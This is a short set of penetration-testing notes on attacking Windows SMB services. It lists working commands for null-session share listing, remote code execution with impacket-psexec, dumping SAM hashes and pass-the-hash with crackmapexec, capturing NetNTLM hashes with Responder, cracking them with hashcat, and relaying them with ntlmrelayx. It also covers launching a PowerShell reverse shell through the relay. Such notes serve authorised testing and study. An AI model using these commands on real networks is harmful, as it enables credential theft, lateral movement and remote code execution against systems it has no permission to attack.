notes

139,445 - SMB

3 min read

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds

SMB typically runs on port 445 or TCP port 139 and UDP ports 137 and 138.

Misconfigurations

SMB can be configured not to require authentication, which is often called a null session.

Anonymous Authentication

We use -N in SMBClient to authenticate as NULL. Also -L list the shares.

smbclient -N -L //<ip>

Remote Code Execution (RCE) via SMB

We can use impacket’s tool PsExec, SMBExec, atexec.

Impacket

impacket-psexec <username>:'<password>'@<ip>

Enumerating Logged-on Users

We can use CrackMapExec to enumerate logged-on users on all machines in the same network.

crackmapexec smb <ip or subnet> -u <username> -p '<password>' --loggedon-users

Extract Hashes from SAM Database

We can even use SMB to extract hashes from SAM Database using crackmapexec.

crackmapexec smb <ip> -u <username> -p '<password>' --sam

and use the gained hash to Pass-the-Hash (PtH) using crackmapexec itself.

crackmapexec smb <ip> -u <username> -H <hash>

Forced Authentication Attacks

We can also abuse the SMB protocol by creating a fake SMB Server to capture users’ NetNTLM v1/v2 hashes. The most common tool to perform such operations is the Responder.

responder -I <interface name>

First we create a fake SMB server using Responder default configuration.

When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host’s IP address by its hostname. On Windows machines, the procedure will roughly be as follows:

  • The hostname file share’s IP address is required.
  • The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.
  • If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.
  • Is there no local DNS record? A query will be sent to the DNS server that has been configured.
  • If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.

These captured credentials can be cracked using hashcat mode 5600.

Note

If we aren’t able to crack NTLMv2 hash. We can potentially relay the captured hash using impacket’s ntlmrelayx. Here’s how:

First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

Then we execute ntlmrelayx

impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip>

We can create a PowerShell reverse shell using https://www.revshells.com/, set our machine IP address, port, and the option Powershell #3 (Base64).

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'cmd'

Graph View